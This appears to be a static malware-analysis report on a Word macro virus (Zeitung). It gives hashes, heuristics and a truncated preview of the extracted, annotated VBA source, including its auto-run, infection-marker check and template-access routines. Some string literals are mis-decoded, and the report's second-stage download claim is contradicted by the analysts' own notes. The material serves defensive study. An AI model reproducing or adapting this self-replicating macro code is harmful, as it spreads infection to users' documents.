Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 cc9703df799f9798…

MALICIOUS

Office (OLE)

75.5 KB Created: 2002-09-17 08:31:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14
MD5: 3734058de8058ea9433445a5986a7fe3 SHA-1: 5d281bfc045fead39a8bf1c8aa3c4b5612e0e3f7 SHA-256: cc9703df799f97982d2a26a4a53407fe8e05577519af8cdbd96b5e14e436c988
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains a malicious VBA macro that runs automatically from the Document_Open subroutine. The macro is assessed as designed to download and execute a second-stage payload, based on the ClamAV detection 'Doc.Trojan.Zeitung-1' and the presence of VBA code that manipulates the NormalTemplate and ActiveDocument VBProjects. Its assessed intent is to compromise the user's system by fetching and running additional malicious code.

Heuristics 3

  • ClamAV: Doc.Trojan.Zeitung-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Zeitung-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 30345 bytes
SHA-256: 3fa2dc84df7e93872c9b96b35173d7e19942761803785392b8ff0978de372db1
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Const Signature = "VirusZeitung" '耔沩囹箴?忤痼襦
'梵 钿?狸溟皂疴觊 腙噤 翦? 栲胴螂釦吗耨玎?疣?栲羼?厘耥鹋痨忤条?噜
'2
'眍戾?2 玎 2000 泐
' --- Analyst notes (placed after the third module line on purpose: ---
' --- Kontaminat() below indexes the module by line number)          ---
' The "Attribute VB_*" lines above are the module header as exported by
' oletools/olevba for the ThisDocument module; they are not part of the
' executable macro body.
' Signature is an infection marker: Kontaminat() searches a target code
' module for this literal to decide whether it already carries this code.
' The presence of the string "VirusZeitung" in a code module of Normal.dot
' or of a document is therefore a usable indicator of infection.
' The trailing comment on the Const line and the three comment lines that
' follow it are mis-decoded in this extraction (they look like a single-byte
' codepage rendered as CJK) and have been kept verbatim.
' NOTE(review): Kontaminat() reads module line 3, drops its first character
' and parses the rest as a number; if VBE line numbering excludes the
' Attribute header, line 3 is the "'2" line above, which presumably serves
' as a version/generation counter -- confirm against the VBE view.
' VBA semantics: only reg is declared Boolean here, sd is an implicit
' Variant. reg is written by Document_Open (False on entry, True later);
' sd is not referenced in the visible part of the listing.
Dim sd, reg As Boolean
' Kontaminat: infection check for one VBComponent. The argument is expected
' to expose a .codemodule (presumably the VBComponents items that
' Document_Open takes from NormalTemplate.VBProject / ActiveDocument.VBProject).
' Returns:
'   0   the marker Signature ("VirusZeitung") is not found within the
'       searched window, or the module has fewer than 50 lines
'  -1   the marker is present but the number read from line 3 is >= 65535
'   n   otherwise, the number parsed from module line 3 after its first
'       character (presumably the comment apostrophe) has been dropped
' NOTE(review): the returned value is presumably a version/generation
' counter; the comparison that acts on it is not in the visible listing.
' NOTE(review): the visible preview shows no network or download call; this
' marker check together with the VBProject access in Document_Open is
' consistent with a self-replicating macro, so the report's "second-stage
' download" attribution should be confirmed against the truncated remainder.
' There is no error handling here: an argument without .codemodule raises,
' which a caller running under On Error Resume Next (as Document_Open does)
' would silently swallow.
Private Function Kontaminat(O)
 ' Find(target, startLine, startCol, endLine, endCol): only the window of
 ' lines 1-100 / columns 1-100 is searched for the marker.
 If Not O.codemodule.Find(Signature, 1, 1, 100, 100) Then
  Kontaminat = 0
 Else
  ' Marker present but module too short to be a full copy: treated as clean
  If O.codemodule.countoflines < 50 Then
   Kontaminat = 0
  Else
   ' Line 3 of the module ("'2" in this sample); Mid(.., 2, Len-1) keeps
   ' everything except the first character.
   Ant$ = Trim(O.codemodule.lines(3, 1))
   Ant$ = Trim(Mid(Ant$, 2, Len(Ant$) - 1))
   ' Val() returns 0 for non-numeric text, so a malformed line reads as 0.
   If Val(Ant$) < 65535 Then
    Kontaminat = Val(Ant$)
   Else
    Kontaminat = -1
   End If
 End If
 End If
End Function
Private Sub Document_Open()
 On Error Resume Next
 Dim ad, nt As Object
 Set nt = NormalTemplate.VBProject.VBComponents.Item(1)
 Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
 If Mid(ActiveDocument.Name, 1, 12) = "冷耜栝 钽铐? Then
  Exit Sub
 End If
 reg = False
 p = 0.05
 Tag$ = ""
 Monat$ = ""
 datum$ = Trim(Date)
 i = 1
 While (Mid(datum$, i, 1) <> ".") And (i < Len(datum$))
  Tag$ = Tag$ + Mid(datum$, i, 1)
  i = i + 1
 Wend
 i = i + 1
 While (Mid(datum$, i, 1) <> ".") And (i < Len(datum$))
  Monat$ = Monat$ + Mid(datum$, i, 1)
  i = i + 1
 Wend
 If (Val(Monat$) = 2) And (Val(Tag$) = 2) Then p = 2 ' 2  翦怵嚯�
 If (Val(Monat$) = 3) And (Val(Tag$) = 21) Then p = 2 ' 21 爨痱
 If (Val(Monat$) = 4) And (Val(Tag$) = 30) Then p = 2 ' 30 囡疱?
 If (Val(Monat$) = 6) And (Val(Tag$) = 21) Then p = 2 ' 21 棹?
 If (Val(Monat$) = 8) And (Val(Tag$) = 2) Then p = 2 ' 2  噔泱耱
 If (Val(Monat$) = 9) And (Val(Tag$) = 21) Then p = 2 ' 21 皴眚�狃�
 If (Val(Monat$) = 10) And (Val(Tag$) = 31) Then p = 2 ' 31 铌?狃�
 If (Val(Monat$) = 12) And (Val(Tag$) = 21) Then p = 2 ' 21 溴赅狃�
 If Rnd >= p Then
  Exit Sub
 End If
 Documents.Add Template:="Normal", NewTemplate:=False
 With ActiveDocument.PageSetup
      .LineNumbering.Active = False
      .Orientation = wdOrientPortrait
      .TopMargin = CentimetersToPoints(1.5)
      .BottomMargin = CentimetersToPoints(1.5)
      .LeftMargin = CentimetersToPoints(2.5)
      .RightMargin = CentimetersToPoints(2)
      .Gutter = CentimetersToPoints(0)
      .HeaderDistance = CentimetersToPoints(1.25)
      .FooterDistance = CentimetersToPoints(1.25)
      .PageWidth = CentimetersToPoints(21)
      .PageHeight = CentimetersToPoints(29.7)
      .FirstPageTray = wdPrinterDefaultBin
      .OtherPagesTray = wdPrinterDefaultBin
      .SectionStart = wdSectionNewPage
      .OddAndEvenPagesHeaderFooter = False
      .DifferentFirstPageHeaderFooter = False
      .VerticalAlignment = wdAlignVerticalTop
      .SuppressEndnotes = False
      .MirrorMargins = False
 End With
 Druck_0 "??????  ?????, 40, True, wdAlignParagraphCenter, 0, False"
 Druck_0 "妈痼耥? 汔珏蜞 皴牝?桁. 逆. 蔫 ?? 叔腚?", 18, False, wdAlignParagraphLeft, 0, True
 Druck_0 "蔓躅?镱 戾疱 觐祜脲牝钼囗? 眍戾疣", 18, False, wdAlignParagraphLeft, 0, True
 Druck_0 "10 爨�  2000  ?   ?2 (2)", 18, False, wdAlignParagraphLeft, 0, True
 Selection.TypeParagraph
 Druck_0 "彦泐漤� ?眍戾疱:", 18, True, wdAlignParagraphLeft, 0, True
 Druck_0 "* 添屙? 麒蜞蝈脲??汔珏蝈. (项溽铕赅 桧蝈疴��)", 18, False, wdAlignParagraphLeft, 0, True
 Druck_0 "* 橡邃腩驽龛� 镱 箅篦�屙�?疣犷螓 汔珏螓:", 18, False, wdAlignParagraphLeft, 0, True
 Druck_0 "** 帖 耦忮瘌屙耱怏屐 疋铋 忤痼?", 18, False, wdAlignParagraphLeft, 0, True
 Druck_0 "** 袜耔朦眍 扈?礤 狍溴��.", 18, False, wdAlignParagraphLeft, 0, True
 Druck_0 "** 砚铋 忤痼?- 疋铊扈 痼赅扈. ", 18, False, wdAlignParagraphLeft, 0, True
 Druck_0 "** 帖 - 忄? 恹 - 磬?(?镳钺脲爨?钺疣蝽铋 疋�玷). ", 18, False, wdAlignParagraphLeft, 0, True
 Druck_0 "* 袜�� 镫囗?", 18, False, wdAlignParagraphLeft, 0, True
 Selection.TypeParagraph
 Druck_0 "******************************", 18, True, wdAlignParagraphCenter, 0, True
 Selection.TypeParagraph
 vb = 1
 ve = 1
 reg = True
 vb = Artikel_B(nt, vb, 1)
 ve = Artikel_E(nt, vb + 1)
 Selection.TypeParagraph
 Druck_0 nt.codem
... (truncated)